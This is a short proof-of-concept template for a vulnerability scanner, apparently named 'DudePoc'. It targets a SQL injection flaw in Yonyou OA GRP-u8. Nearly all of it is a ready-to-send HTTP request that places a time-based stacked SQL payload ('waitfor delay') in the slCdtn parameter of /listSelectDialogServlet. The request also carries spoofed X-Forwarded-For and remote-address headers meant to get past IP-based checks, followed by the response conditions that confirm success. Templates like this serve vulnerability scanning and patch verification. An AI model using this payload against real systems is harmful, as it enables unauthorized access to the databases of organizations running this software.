<DudePoc_Name>用友 OA GRP-u8 sql注入</DudePoc_Name>
<DudePoc_Description>用友 OA GRP-u8 sql注入</DudePoc_Description>
<DudePoc_SetHeader>
GET /listSelectDialogServlet?slType=slFZX&slCdtn=1=2;waitfor%20delay%20'0:0:1' HTTP/1.1
Host: $<AttackHost>$
X-Forwarded-For: 127.0.0.1
X-Originating: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>\[\]</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
